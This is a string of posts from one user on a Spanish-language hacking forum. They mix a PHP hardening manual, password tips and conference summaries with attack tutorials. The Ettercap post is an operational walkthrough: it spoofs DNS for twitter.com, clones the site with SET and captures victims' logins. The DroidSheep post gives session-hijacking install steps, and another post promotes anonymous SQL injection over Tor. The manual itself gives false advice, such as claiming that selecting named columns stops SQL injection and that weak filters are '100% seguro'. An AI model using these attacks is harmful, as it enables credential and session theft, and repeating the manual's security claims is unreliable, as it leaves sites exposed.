 
Mostrara en grande el comentario que hizo y nos puede hacer infinidad de cosas mas asi que

ya sabes si no quieres que te hagan eso utiliza la funcion Strip_tags.

Htmlentities

Bien lo que hace esta funcion es cojer una cadena y transformarla en entidades html

Un ejemplo esto: <script> seria transformado en: &lt;script&gt;

Bueno pondremos un ejemplo usando htmlentities y otro sin el miren esto:



Ok lo que el atacante quiere es mostrar su comentario en grande pero como usamos lo siguiente:


Código:
Citar
<?php
$Proteccion = htmlentities($_REQUEST['Comentario']);
echo $Proteccion;
?>
 
Entonces lo que hara sera envez de mostrarse todo en grande la etiqueta (tag) <h1> sera

Transformado a una entidad html y haci no se mostrara el mensaje grande.

Bueno hay muchos mas funciones de php para filtrar las cadenas pero creo que con estas dos

vas bien. hay mas como htmlspecialchars que es exactamente igual a htmlentities solo que trabaja

con UTF8.

[-] - - - - - - - - - - - - - - - - - - - - - - [-]

[4.2] Evitar Sql injection:

Bien pues este es un error muy tonto pero que tiene facil solucion algunos por ejemplo cometen

fallos como el siguiente:


Código:
Citar
SELECT * FROM painboy
 
Bueno pues con ese codigo podemos obtener lo que yo quiera es totalmente vulnerable a sql injection

Por un simple * podemos poner en riesgo nuestro website asi que para arreglarlo haremos lo


Siguiente:

Código:
Citar
SELECT nombre FROM painboy
 
Asi se concreta y solo busca ahi y no nos arriesgamos a nada.

[-] - - - - - - - - - - - - - - - - - - - - - - [-]

[4.3] Evitar Rfi

Rfi (Remote file inclusion) Su nombre lo dice todo asi que vamos con ello esta tecnica es dificil

encontrarla para ejecutar de varias formas que ahora te contare y te contare como evitarlo.

Para que RFI Funcion necesitas lo siguiente:

1- Error en la programacion
2-Tener Register_globals en on
3-allow_url_fopen en on

Bueno pues si esta todo eso como indico entonces si podras hacer un remote file inclusion

Asi que te pondre un codigo vulnerable de RFI

Código:
Citar
include($URL)
 
Ok bien como vemos se incluye lo que sea!

Asi que para explotarlo seria:

www.web.com/archivo.php?URL=SHELL

Bueno y claramente queremos evitar esto asi que vamos a hacer lo siguiente:

1-No cometer errores en la programacion
2-Register_globals en OFF
3-allow_url_fopen en OFF

Empezamos:

[4.3.1] No cometer errores en programacion:

Como hemos visto lineas antes se veia un codigo vulnerable a rfi ok bien pero cual es el problema

de ese codigo pues que se incluye lo que sea y lo que haremos sera usar file_exists

Pondre un codigo 100% seguro contra rfi (Remote file inclusion):


Código:
Citar
$url = intval($_GET['url']); //la variable URL solo tendra un valor entero
$archivo = “./documentos/cont”.$url.”.php”; //localizacion del archivo
if (file_exists($archivo)) include($archivo); // lo busca y si existe lo muestra
 
lo que hemos echo es simplemente verificar si lo que hemos introducido esta dentro de nuestro

hosting y que tenga una extension .php y si ese archivo existe pues se muestra.


[4.3.2] Register_globals en OFF

Buenas pues mira debes abrir el archivo Php.ini y introducir la siguiente linea:

Código:
Citar
Register_globals = off
 
y guardas y ya tendras Register_globals en OFF

Si tienes mas dudas sobre como ponerlo en off o sobre el archivo Php.ini mira mas arriba y te viene

Una explicacion mas extensa y mas entendible

[4.3.2] allow_url_fopen en OFF

Bueno pues como en register_globals es exactamente igual debes abrir el archivo

Php.ini y introducir la siguiente linea:

Código:
Citar
allow_url_fopen = off
 
y luego guardar el archivo php.ini y subirlo.

[-] - - - - - - - - - - - - - - - - - - - - - - [-]

[4.3] Evitar lfi

Lfi (Local file inclusion) inclusion de archivos internos (locales) bueno eso significa que sirve para mucho

No les parece para los atacantes esto es una joya ya que pueden obtener datos muy sensibles

Empezamos como para que vean como evitar este ataque:

Pondremos un codigo vulnerable a lfi para que entiendan mas o menos:


Código:
Citar
<?php
if(!$_GET['objeto']){
 include('painboy.php');
}else{
 $_GET['objeto'] = str_replace('http://','', $_GET['objeto']);
 if(file_exists($_GET['objeto'].'.php')){
  include($_GET['objeto'].'.php');
 }
}
?>
 
Ok parece un codigo totalmente normal sin problema algun verdad pues si te das cuenta no filtra

el escalar directorios! si escalamos directorios y empezamos a ver cosas que no se podrian de ver

Nuestra website correria mucho peligro asi que les enseñare a filtrar el escalamiento de directorios

y el no incluir archivos locales para asi mostrarlos y dar informacion sensible al atacante.

Código:
Citar
<?php
$_GET['proteccion'] = str_replace(array('.','/','\\'),'',$_GET['proteccion']);
?>
 
Ok ahora imaginen que la variable proteccion quiere mostrar un contenido ok?

Ok pues lo que hariamos seria usar la funcion de php str_replace para borrar los codigos utiles

que al atacante le sirve para escalar directorios y mostrar asi archivos locales asi que ya saben

Usen str_replace y luego filtren lo que necesiten para evitar lo que quieran en este caso

con el ejemplo que es 100% seguro filtramos lfi.

[-] - - - - - - - - - - - - - - - - - - - [-]

[5] Recomendaciones:

Bueno aparte de esto te doy unas recomendaciones

1: No subas muchos scripts a tu hosting (muchas veces si subes muchos scripts la gente si ve que
tu website el mostrado no tiene bugs y demas o no puede con ella ira a escanear tu web y vera
que tienes mas scripts en tu hosting y intentara acceder por medio de esos scripts por medio de
algun bug que tenga esos scripts asi que mucho cuidado con lo que subes siempre intenta limitarte
al subir algo.

2: Sigue los consejos que te doy ya que son muy utiles y recuerda tener este archivo siempre en tu
Pc por si acaso lo necesitas en algun momento y no lo encuentras en la red.

3: Con respecto al login que te enseñe a hacer con htpasswd y htaccess te recomiendo esconder
el archivo htpasswd en directorios y cambiarle el nombre al archivo .htpasswd y modificar un poquillo
el login asi le dificultas la entrada al atacante.


[-] - - - - - - - - - - - - - - - - - - - [-]

[5] Despedida:

Bueno este manual se lo dedico a toda aquella gente que desea tener un website seguro y que

bueno se lo dedico a toda mi comunidad y demas bueno pues eso espero que hayan aprendido y

Demas y que apliquen lo que les digo. Si vas a poner este Manual en algun otro sitio respeta el

Copyright saludos amigos.

  • Ficha de contacto:



Creador: Painboy

[-] - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [-]

11
Seguridad / Curso de Seguridad Informatica
« en: Mayo 29, 2012, 08:16:45 am »
Curso de  Seguridad Informatica

Hola amigos! Este curso  es fundamental para todo aquel que quiera aprender SEGURIDAD Doy un Agradecimiento ami amigo! Cronos ya que los paso ah .pdf   espero les sirva mucho! Y resuelva sus dudas salu2



Curso Uno
Curso Dos
Curso Tres
Curso Cuatro Parte 1
Curso Cuatro Parte 2
Curso Cuatro Parte 3


Desrcarga todos juntos!
Pass: underc0de.org/foro (solo del rar)




12
Seguridad / Proteger nuestra cuenta al 99%
« en: Mayo 29, 2012, 07:49:52 am »
 Al obtener una cuenta, debemos saber varias cosas sobre seguridad, las cuales debemos aplicar a nuestra política de seguridad de cuentas, para hacerlas 99% seguras.

Así que en este post explicaré lo mas breve posible, como proteger nuestra cuenta al 99%.


La contraseña

La contraseña es uno de los factores indispensables en la seguridad de nuestra cuenta, así que debemos tener en cuenta varias cosas, antes de asignar una contraseña así por las buenas. Así que nombraremos varios factores a tener en cuenta:


A) La contraseña, debe ser INTRANSFERIBLE.

Esto quiere decir, que no le dejaremos nuestra contraseña a absolutamente a NADIE, ni a nuestra madre, ni a nuestro padre. Existe un viejo dicho informático que dice así: "Conoce a alguien y tendrás un amigo, regístrate y tendrás una cuenta, préstale la cuenta a tu amigo y te quedarás sin AMIGO y sin CUENTA."
Si por algun caso temporal y excepcional necesitamos dejarle la cuenta a un amigo, deberemos cambiar nuestra contraseña y introducir una temporal, si hacemos esto correremos el riesgo de perderla, ya que todo depende de nuestro amigo. El amigo nunca debe ser virtual, siempre a ser posible debe ser un familiar cercano, en el cual durante toda nuestra vida hemos depositado nuestra confianza y pocas veces nos ha fallado.


B) Contenido de la contraseña.

El contenido de la contraseña debe ser totalmente incomprensible, esto quiere decir que si nos llamamos Pepe y tenemos 20 años, no pongamos de contraseña 1987 o PepeMartin.
Para tener un contenido seguro debemos mezclar Letras, números y símbolos y la longitud de nuestra contraseña debe superar los 8 carácteres.
Supongamos que nuestro amigo Pepe Martín de 20 años, quiere una contraseña de contenido seguro, pongamos un ejemplo de alguna:

Algo seguro sería: P27M_120

Esa contraseña contiene 8 carácteres, números y símbolos. Sin envargo siempre podemos utilizar nuestras propias políticas de contraseñas, por ejemplo empezar y acabar siempre con un símbolo, sin importar el contenido de dentro. Algo como: ¿p27m_120?

Esta última sería todavía mas segura.

¿Pero, para que sirve realmente lo de los símbolos?

Esto previene los ataques por fuerza bruta y por diccionario, ya que si nos hacen un ataque por fuerza bruta, el programa intentará 100000 convinaciones de letras y números para petar nuestra contraseña. Y nosotros al insertar tantos símbolos demoraremos muchísimo el proceso de fuerza bruta, hacíendolo muy durarero, tanto tanto que el atacante se llegará a cansar de esperar resultados.


C) Factores externos

Los factores externos, es un punto a tener en cuenta, y se refiere a todo aquello ajeno a nuestra cuenta y a nosotros y que pudieran afectarnos directamente.
Dentro de los factores externos detallaré tres puntos importantes:
Nunca escribir nuestra contraseña en ninguna página Web, sea de lo que sea.
Nunca enviar por email nuestra contraseña a NADIE, ni siquiera a la empresa de nuestra cuenta, ya que ellos la tienen almacenada y nunca nos la pedirán via e-mail.
No escribir nuestros datos en ningún programa para conseguir cuentas de los demás, la mayoría de estos programas sirven para engañar al usuario y para perder nuestra cuenta.



D) Factores Internos

En los factores internos, me refiero a nuestro PC, o al PC que utilizaremos para logearnos a nuestra cuenta.
Aquí lo mas importante es el estado del pc que utilizaremos para conectarnos, debe estar protegido y actualizado. Para hacerlo mas simple y sencillo a continuación expongo varios elementos a tener MUY en cuenta:
El Sistema Operativo que utilize nuestro ordenador, debe tener instalas las últimas actualizaciones publicadas por la empresa del S.O
Nuestro ordenador debe contar con un AntiVirus actualizado a fecha de hoy, o la última fecha de actualización del AntiVirus.
El pc debe contar con un sistema de Firewall, ya sea por defecto del sistema operativo, de hardware o un software alternativo.
Nuestro pc lo debe utilizar siempre la misma persona, o personas muy cercanas y de mucha confianza, como algun familiar.
Debemos tener instalada la última versión del programa por el cual nos vamos a logear en nuestra cuenta, si fuera el caso del msn, sería Msn Messenger Live, nunca Messenger 4.2, 5.0, 6.2, 7.5 etc...
Si estamos conectados a una red local (LAN) en la cual no somos Administrador, dependeremos siempre de lo listo que sea el Administrador de esa red, ya que podría capturar nuestros datos en cualquier momento.


E) Pregunta y Respuesta secreta

Muchos sistemas de gestión de cuentas de usuario, cuentan ya con la implementación del sistema de Pregunta y Respuesta secreta (PyRs). Esto consiste en elegir una pregunta y una respuesta que solo debemos conocer nosotros y que se nos preguntará en el caso de que perdamos la contraseña de nuestra cuenta y no podamos acceder a ella.
¿Que debemos tener en cuenta a la hora de crear una pregunta secreta?
Nada
Podemos escoger la pregunta mas tonta del mundo, por ejemplo: ¿Cómo te llamas?
La pregunta es un gran tontería, ya que se nos mostrará en el caso de perder el password de nuestra cuenta, pero ahí vamos...
¿Que debemos tener en cuenta a la hora de crear una Respuesta secreta?
La respuesta secreta NUNCA
debe contestar a la pregunta.

Esto sería un mal ejemplo:
Pregunta -> ¿Cúal es tu nombre? Respuesta -> Pepe
Esto sería un buen ejemplo: Pregunta -> ¿Cúal es tu nombre? Respuesta -> Ayer fui al cine


Sobre el sistema PyRs, no hay que tener muchas mas cosas en cuenta, ya que su uso es sencillo y no nos causará ningún problema si lo utilizamos de esta última forma.


¿Cómo voy a recordar todas estas contraseñas y respuestas que nada tienen que ver con la pregunta secreta?
Está totalmente demostrado que los Monos son capaces de recordar hasta 8 cifras... si ellos pueden acordarse de 8 numeritos... ¿de que somos capaces nosotros? o mejor dicho.. ¿De que no somos capaces?

¿Porqué hablamos siempre de la protección al 99%?
Porque siempre dejo un 1% de que puede surgir un fallo en la empresa que nos gestiona nuestra cuenta y por mucha protección que tengamos nosotros, podemos vernos afectados por un fallo de seguridad por parte de la empresa.


Glosario del post

A continuación explicaré varios términos utilizados en este post, que no deberías saber que significan si nadie te los ha explicado

Fuerza Bruta
AntiVirus
Firewall o Cortafuegos
Red Local (LAN)


Bueno eso es todo, espero que os sirva a la hora de crearos una cuenta, ya sea de un foro, de correo, de un juego, de un banco.... y que este tema no haya sido en bano. Mi objetivo es reducir al 99% todos los temas en los que los usuarios dicen que han perdido su cuenta.
El objetivo de este post es que los usuarios lo lean y aprendan, así que por el momento permanecerá en este Area, pero con el tiempo pasará a la sección de Seguridad
Espero que haya sido de ayuda.


Saludos,

13
Hacking / GuadalajaraCON 2012 ( video de la conferencia )
« en: Mayo 28, 2012, 08:39:09 am »
Hola amigos de Underc0de os traigo esta conferencia que esta interesante! espero la entiendan y si tienen dudas las comenten salu2

Disfruten!


DIA 1

1-Hide and Find Rootkits in Linux -- por Marcos Schejtman (@NataShell666)



En la plática se mostrarán las tecnicas para esconder y encontrar rootkits en los sistemas linux, ya sea mediante SLAB, reconstruccion de la tabla de procesos o mediante el sistema virtual de PROC/SYS.

 ---------------------------------------------------------

2-Laboratorio de análisis de malware por Hugo Gonzalez (@hugo_glez)

Como montar un laboratorio de análisis de malware. Incluyendo todo el proceso, desde la captura hasta el análisis.


--------------------------------------------------------------

3-Cazando predadores en Internet por David Moreno (@4v4t4r)

Caso reciente del proyecto colaborativo contra pederastas en internet: Conferencia: Anti-Depredadores.org


------------------------------------------------------------------

4-Detectando intrusiones en la red por Roberto Martinez (@r0bertmart1nez)

Se mostrará un ataque desde Metasploit y se identificarán los patrones que pueden ayudar a identificar el ataque. Adicionalmente se trabajará con una muestra de malware.



-----------------------------------------------------------------------
5-Routerpwn 1.5.146 por Pedro Joaquín (@_hkm)

Los últimos avances en cuanto a la herramienta, algunos secretos y una función de detección automatizada de módems.




-----------------------------------------------------------------------

DIA  2

1-Escaneo de puertos distribuido por Paulino Calderón (@calderpwn)

Resolveremos uno de los problemas más comunes para pentesters; como realizar escaneos de Nmap distribuidos para evitar limitantes como el ancho de banda y falta de tiempo al escanear una lista grande de objetivos.


---------------------------------------------------------------

2-Criptografía experimental por Eduardo Ruiz (@toorandom)

Se explicará una nueva estructura algebraica que cumple los requerimientos necesarios para ser criptográficamente segura en términos de logaritmos discretos en grupos abelianos. Más rápida, de tal manera que los ataques actuales no sean efectivos sobre esta plataforma algebraica.



------------------------------------------------------------------------

3-DotDotPwn 3.0 por Alejandro Hernandez (@nitr0usmx) y Christian Navarrete (@chr1x)


DotDotPwn es una herramienta diseñada para automatizar el proceso de búsqueda de vulnerabilidades de Directory Traversal o Escalada de Directorios. Esta escrita en Perl. Permite auditar servicios de FTP, TFTP, HTTP, o cualquier aplicación web.



---------------------------------------------------------------------------------

4-Cómo romper RSA con OpenSSL por Eduardo Ruiz (@toorandom)

Hablaremos de cómo funciona RSA y romperemos una llave al azar en tiempo real generada con OpenSSL, reconstruiremos la llave privada dada la pública y analizaremos la matemática detrás de este problema.



--------------------------------------------------------------------------------------
5-USB Attack Toolkit (UAT) por Oscar López (@xianur0)

Herramienta para explorar y explotar el protocolo USB llamada UAT (USB Attack Toolkit). La herramienta tiene funciones muy interesantes como un mejor sniffing que Wireshark para tramas grandes y la posibilidad de realizar fuzzing al protocolo USB.

 


-------------------------------------------------------------------------------------
6-Criptografía vs Esteganografía por Eduardo Ruiz (@toorandom)

Uso de transformadas trigonométricas discretas para optimizar los algoritmos esteganográficos sobre imágenes digitales evitando incremento en datos resultantes y poca pérdida de calidad en imágenes.


14
Seguridad / Anonymato completo? --> Enterate aqui!
« en: Mayo 27, 2012, 11:14:01 pm »
ANONYMATO COMPLETO?
Hola amigos, recién me entero de la existencia de este vídeo! la verdad que me quede asombrado ya que es dificil encontrar un video tutorial bien explicado como este, ya que el ANONYMATO en la red es fundamental ya sea para proteger tu IP de ataques de hackers y navegar de modo anonymo , como tambien atacar y tener un anonymato  Muy bueno!  sin mas  amigos de Underc0de les dejo este video tutorial! Diviértanse!


ANONIMATO EN INTERNET: TOR, POLIPO Y SQLMAP
Pasar desapercibido ha sido algo que siempre me ha caracterizado, al menos eso creo, me resulta empalagoso, se me pone la piel de gallina y hasta siento vergüenza ajena cada vez que observo los torpes intentos por llamar la atención de aquellos chicos que decidieron enamorarse perdidamente, perdedoramente diría yo, de aquella chica que le presta la misma atención que se le presta a los desafortunados vendedores de biblias o empadronadores de censo.

Sin embargo, pasar caleta por la vida no es del todo una buena idea, siento que despilfarre tiempo valioso cuando hacía cosas buenas pero que debido a la desafortunadamente decisión nadie se enteraba, pasar solapa es, en todo caso, sentirse y estar más pintando que un cuadro.

Hace algún tiempo decidí buscar el equilibrio correcto entre un galifardo figuretti y un chancón primer puesto de colegio, el producto de esa mezcla se encuentra en este blog y en los videos de Youtube, que debo reconocer que la primera vez que los vi sentí que debía borrarme olímpicamente del planeta.

Finalmente, el video tutorial ha sido realizado con la finalidad de mostrar como navegar de manera anónima por Internet y mostrar como se hacen ataques de hacking sin dejar huellas ni rastros. Espero les sirva el video.

El contenido del video es:

-Instalación y configuración de: TOR, POLIPO y VIDALIA (Descargar pasos de instalación : http://www.el-palomo.com/wp-content/uploads/2012/04/recursos_instalacion.txt

-Pruebas de navegación anónima con TOR y POLIPO, verificación con la herramienta ETHERAPE

-Ataques SQL Injection de manera anónima a un servidor web

-Presentación PDF mostrada en el video tutorial (Descargar: http://www.el-palomo.com/wp-content/uploads/2012/04/Navegacion-y-ataques-anonimos-en-internet-SQLMap-+-TOR-v2.0.pdf



fuente : el-palomo.com

ESPERO LES AYUDE AMIGOS!

15
Bugs y Exploits / Sql injection avanzado
« en: Mayo 27, 2012, 09:27:55 pm »
SQL INJECTION AVANZADO: TEORÍA Y AUTOMATIZACIÓN DE TAREAS CON METASPLOIT


Tenía planeado realizar un video tutorial sobre la explotación avanzada de aplicaciones web, mostrando hasta donde se puede lograr penetrar bases de datos y sistemas operativos a través de Inyecciones SQL (SQL Injection);  he tratado de colocar en el video no sólo como hacerlo sino explicando algo de teoría de sentencias SQL con el objetivo de no aprender de paporreta las cosas ni sólo utilizar herramientas, sino también, con el objetivo que puedan ejecutar inyecciones SQL avanzadas de manera manual y utilizar su ingenio e imaginación lo máximo posible. Además, ¿alguien puede negar que hacerlo manualmente no es más placentero que sólo ejecutar unos cuantos comandos? es más divertido entender como funciona y hacerlo manualmente.

Las inyecciones SQL es en la actualidad la vulnerabilidad más significativa y crítica que se encuentran en aplicaciones web, además está reflejada en el OWASP TOP TEN 2010, donde se enumeran las principales vulnerabilidades comparadas contra el TOP TEN del año 2007.


EL VIDEO CONTIENE:

Análisis de vulnerabilidades avanzado de aplicaciones web con ACUNETIX
Teoría de SQL Injection avanzado: sentencias:UNION, INTO OUTFILE, INTO DUMPFILE
Inyección de PAYLOADS a nivel del sistema operativo de la base de datos
Automatización de ataques sql injection avanzado con SQLMAP y METASPLOIT
Este video está dirigido a los administradores de servidores, desarrolladores de aplicaciones web y administradores de seguridad de información, quienes deben revisar las vulnerabilidades de aplicaciones web antes de poner en producción un nuevo sistema de información web. Espero les sea de utilidad el videotutorial.

MATERIAL DEL VIDEO:

Presentación mostrada en el video tutorial:  http://www.el-palomo.com/wp-content/uploads/2012/05/Ataques-de-Inyeccion-SQL-Avanzadov1.1.pdf

Lista de comandos ejecutados en el video tutorial:  http://www.el-palomo.com/wp-content/uploads/2012/05/codigoSQLI.txt



fuente:el-palomo.com

Espero les guste y se diviertan!
   

 

16
Hola amigos de Underc0de

la ayuda que necesito es que : CON UNA ANTENA SATELITAL (TVS) , COMO CONVERTIRLA  PARA QUE CAPTE SEÑAL WIFI DE 2km.

tengo esta

 

 que es lo que necesito.

y  como poder conectarla ami pc (BACKTRACK)  ...   espero su ayuda amigos  :'(

17
Android / Session Hijacking: Secuestro de sesiones via DroidSheep
« en: Mayo 26, 2012, 04:21:30 pm »
Hola amigos de Underc0de, hace poco vi este vídeo tutorial echo por  "EL PALOMO "   en lo particular me gusto mucho  ya que por medio de un mobil (celular) empezó ah  secuestrar sesiones ,  espero que se diviertan!


Cuando tenía 17 años empecé a ver los programas de Marco Aurelio Denegri (un intelectual peruano de avanzada edad,  que debe ser, creo yo, uno de los intelectuales más importantes de Latinoamérica), me gustan sus programas porque denota en sus comentarios harto conocimiento, cita fuentes importantes y siento en sus palabras algo de cólera, como si estuviera molesto con el público, con sus camarógrafos y hasta con él mismo; esa energía que le pone para criticar las cosas me cautivó y siempre que puedo veo su programa. Hace una semanas pude ver  un programa donde hablaba de los “accesorios tecnológicos” como los celulares, las tabletas y cualquier dispositivo que podamos llevar con nosotros sin que nos ocupe mucho espacio, él comentaba que estos dispositivos se han vuelto para nuestra generación en una “prótesis” de nuestros cuerpos, en algo tan elemental que en la actualidad sin ellos no podríamos sobrevivir.

Basta salir a la calle y observar detenidamente, todos tenemos una prótesis tecnológica adherida a nuestro cuerpo, desde celulares convencionales sin un sistema operativo sofisticado hasta Smartphones con Android y iPhone o tabletas que inundan con mas frecuencia cada minuto nuestras calles.

LA ERA POST PC

Esta nueva era es cada vez mas notoria, en algunos países demorará mas en llegar, definitivamente Perú no será el pionero de esta nueva era, pero toca reconocer que Perú debido a su crecimiento económico constante los últimos 12 años lleva la ERA POST PC avanzando lentamente sin detenerse; todo suena muy bonito, todo suena prometedor y parece augurar un futuro prospero, sin embargo, hay otros aspectos en los cuales no hemos avanzado absolutamente nada, ni siquiera hemos dado un paso – ni medio diría yo – y se trata de la seguridad de información.

Para muestra sólo un botón (así dicen mis padres):

¿Cuántos tienen encriptado su teléfono celular, es decir,  encriptada y protegida la información que tienen sus dispositivos móviles?
¿Cuántos tienen una contraseña o patrón de bloqueo para sus equipos celulares que sea considerado robusto?
¿Cuántos se sienten felices de encontrar una red wireless libre (parques, centros de reuniones, patios de comida, etc.) y aprovechan la misma para revisar su correo electrónico, cuenta de Facebook u otras cuentas personales?
Y el peor de todos ¿cuántos llegan a algún sitio y sienten la urgencia (casi necesidad biológica) de tomarse una foto y compartirla de inmediato a alguna red social poniendo al descubierto su ubicación sin necesidad de un GPS?
Los hackers, llamémoslos así, ahora tienen mira puesta en esta nueva era, LA ERA POST PC, y debemos reconocer que en el Perú el nivel de conciencia en cuanto a seguridad de información se refiere es todavía muy débil y le facilita el trabajo a aquellas personas que suelen aprovecharse de estas facilidades, además, los hackers ya no necesitan una laptop para obtener información crítica, ahora sólo les basta un equipo celular para lograr acceso a información sensible.

¿Quiénes deben preocuparse?

Voy a clasificarlo de la siguiente manera:

LUGARES PÚBLICOS SIN CONTROL
En esta clasificación están los lugares públicos y que por lo general están bajo la responsabilidad del estado, por ejemplo: parques con internet gratis, centrales de ómnibus con internet gratuito, etc.; pienso que conectarse a internet para acceder a información sensible a estas redes públicas es casi un suicidio, es casi pegarse un letrero en la frente que diga: “Please, rob me”. Bajo este escenario no hay responsables, nadie controla la seguridad de las comunicaciones y es que simplemente no hay presupuesto para controlar todo esto.

 

LUGARES PÚBLICOS QUE DEBEN SER CONTROLADOS
Aquí la situación es distinta, aquí hablamos de sitios donde si hay responsables quienes deben preocuparse de la seguridad de las comunicaciones, por ejemplo:

LOS HOTELES: En mi experiencia en Perú y en algunos otros países de América donde me he hospedado, ningún hotel vigila o brinda seguridad a sus redes públicas, es decir, aquella red (que por lo general esta separada de la red operativa del hotel) donde todos los huéspedes se conectan para revisar sus correos empresariales, información corporativa sensible y realizar transacciones bancarias. Esto resulta extremadamente crítico, se imaginan lo que pasaría si un hacker realiza el robo de credenciales de una tarjeta de crédito en algún hotel y esta información se hace pública? El hotel simplemente desaparecería del mercado, sería catalogado como un hotel inseguro, es decir, donde se realizan robos y su reputación se vería en ruinas.

SITIOS DE REUNIÓN: No voy a colocar nombres para evitar problemas pero hago referencia a todas aquellas empresas que tienen un establecimiento de comida y/o reuniones de trabajo donde se le brinda al cliente una conexión de red, una conexión a internet mal llamada gratuita porque en realidad el cliente la está pagando al consumir algún producto. En estos sitios también se realizan transacciones bancarias, se leen correos importantes, etc; alguien protege estas redes de comunicación? Que pasaría si mañana algún empresario importante denuncia haber sido víctima del robo de su correo electrónico en alguno de estos establecimientos?

SESSION HIJACKING – DROIDSHEEP

Droidsheep es una aplicación para sistemas operativos Android que captura las cookies e identificadores de sesión mediante la técnica de hombre en el medio, luego las selecciona, procesa y te muestra un listado simple de las sesiones secuestradas, es muy similar a lo que alguna vez fue el famoso plugin de Firefox: FIRESHEEP.

Detalles de instalación:

1-Rootear el dispositivo móvil con S.O Android. Para este video hemos utilizado un Galaxy Nexus

2-Instalar ARPSPOOF en el dispositivo móvil con S.O Android : http://el-palomo.com/wp-content/uploads/2012/05/Arpspoof.apk

3-Instalar Droidsheep en el dispositivo móvil con S.O Android: http://el-palomo.com/wp-content/uploads/2012/05/droidsheep-current.apk

Nota: La página oficial de Droidsheep fue obligado a retirar el software por ser considerado una herramienta para hackear pero el código fuente se encuentra en la página web. Pienso que la herramienta debería ser considerado un muestra de lo sencillo que es realizar ataques desde un dispositivo móvil …. bueno…. eso es definitivamente otro tema.

4-Opcional: Instalar Shark for ROOT (Wirehark para dispositivos móviles)


18
Hacking / Olfateando Passwords con Ettercap
« en: Mayo 25, 2012, 03:04:58 pm »

Olfateando Passwords con Ettercap por Intruder-T23

Introducción:
Este tipo de ataque consiste en envenenar el DNS de una red LAN. Cuando alguien de la intranet entra en algún website (en su navegador la víctima coloca la página web exactamente como es, por ejemplo, este coloca "www.twitter.com") e introduce su nombre de usuario y password, esta información llega a la computadora del atacante, quien se encuentra olfateando la red.

Datos Basicos:
Distro: Backtrack 5
Herramientas: Ettercap y SET (Social-Engineer Toolkit).
Tipo de Ataque: Olfateo y Envenenamiento de DNS (DNS Poisoning).
Resultados Obtenidos: Nombre de usuario y password.

Configurando etter:
En la terminal, se teclean los siguientes comandos:

Citar
A. ifconfig
B. locate etter.dns
C. nano /usr/local/share/ettercap/etter.dns


Descripción de comandos:
A. Se teclea "ifconfig" para ver la dirección IP local de la computadora atacante, la cual es 192.168.1.104. También se ve la interfaz de la tarjeta wireless, la cual es wlan0.
B. Se teclea "locate etter.dns" para localizar el directorio del archivo etter.dns.
C. Se usa el comando "nano" mas el directorio del archivo etter.dns para así poder editarlo.

Archivo Etter.dns:
Aquí se añaden las siguientes líneas:
Citar
twitter.com       A 192.168.1.104
*.twitter.com     A 192.168.1.104
www.twitter.com   A 192.168.1.104
 

Twitter.com es el website donde la víctima introducirá su nombre de usuario y password. Como pueden ver, también hay que introducir la dirección IP de la PC atacante. Una vez que se llenan los datos, para guardar los cambios se debe teclear lo siguiente: "control+x" (Ctrl más la tecla x), luego se teclea "y", y finalmente "enter".

Social-Engineer Toolkit (SET):

Después de realizar los cambios en el archivo etter.dns, se teclea el símbolo del dragón para ir a: Backtrack>>Explotation Tools>>Social Engineering Tools>>set

Dentro de SET, se teclea:
1) Social Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

Dentro de SET, se coloca el website y queda de la siguiente forma:

Citar
Enter the url to clone: www.twitter.com

Y se teclea la tecla enter para dejar el website falso corriendo en el puerto 80...

Ettercap:
En la consola, se teclea:

Citar
ettercap -T -q -l wlan0 -P dns_spoof -M arp // //

Finalmente, cuando la víctima entra a la página web e introduce su nombre de usuario y password, la información llega a la computadora del atacante. En el video, el nombre de usuario es "internaut" y el password es "password123".

Descarga del Video Tutorial de buena calidad:

http://www.filefactory.com/file/2577oxhg4ay7/n/ettercap_MP4_by_Intruder-T23.mp4

Mala calidad :(








Fuente : http://foro.el-hacker.com/f60/video-olfateando-passwords-con-ettercap-por-intruder-t23-340827/


sa sa sa ludos  ;D

19
Hacking / DNS Poisoning "Video"
« en: Mayo 25, 2012, 02:55:17 pm »
Hola, os quiero compartir este video que es muy interesante ya que  lo que el atacante hace es entrar al router del vecino con el (Gerix wifi cracker)
luego se pone a clonar la pagina de facebook , y  DNS Poisoning.  es muy bueno.



20
Hacking / Laboratorio "Hack Novato"
« en: Mayo 24, 2012, 06:28:41 pm »
Hack Novato 

by Badcode y Angelus_7722

consta de 3 videos tutoriales.

- Tuto 1.

En este tuto podran observer el método de importación de maquinas virtuales en VMWare Workstation 6, que nos permite utilizar maquinas virtuales de distintas versiones (no superiores) ya configuradas para realizar este tipo de laboratorios.

Name:   tuto1.rar
Size:   14.9MB (15637766 bytes)
Modified:   2011-07-27 05:05:13
md5:   6aa6c56966a84b7cd3e651b19c5cf947
URL: http://www.adrive.com/public/PYQvFy/tuto1.rar
Expires:   2012-06-12



- Tuto 2

Aqui observaran como se creó el ambiente virutal para realizar la practica de identificacion de banners, los software utilizados y servicios instalados.

Name:   tuto2.rar
Size:   16.7MB (17478925 bytes)
Modified:   2011-07-27 05:05:12
md5:   116a141519ea6d6172a85f68076eb0da
URL: http://www.adrive.com/public/tA773h/tuto2.rar
Expires:   2012-06-12


- Tuto 3

Aquí entramos en forma con algunas técnicas para obtener la info de la publicidad de los servicios denominadas identification banners

Name:   tuto3.rar
Size:   15.5MB (16262405 bytes)
Modified:   2011-07-27 05:05:12
md5:   e8ec3754b8949cf2043ed4758c9cc253
URL:   http://www.adrive.com/public/uAzVgN/tuto3.rar
Expires:   2012-06-12

ESTO ES LO MAS BASICO
--------------------------------------------------------------------------------------------------------------------------------


Laboratorio 2 Hack Novato




Este Segundo laboratorio hace referencia a la Enumeración del Objetivo, otro de los pasos iniciales antes de un ataque debidamente estructurado.

El tutorial está conformado por 1 videos, cada una con distintas formas o métodos de realizar la enumeración del objetivo.

Cita:
La enumeración de objetivos, es la actividad mediante la cual podemos obtener, recolectar y organizar la información de máquinas, redes, aplicaciones, servicios y/o otras tecnológias disponibles y ofrecidas por el o los objetivos.
Realmente no se considera un ataque, púes solo pretende recopilar de manera organizada información disponible mediante consultas, con el fin de elaborar verdaderos ataques, basados en los resultados obtenidos mediante la enumeración.
Las herramientas y técnicas de enumeración están basadas en su mayoría en escaneos simples a la máquina objetivo, o en simples peticiones o consultas.
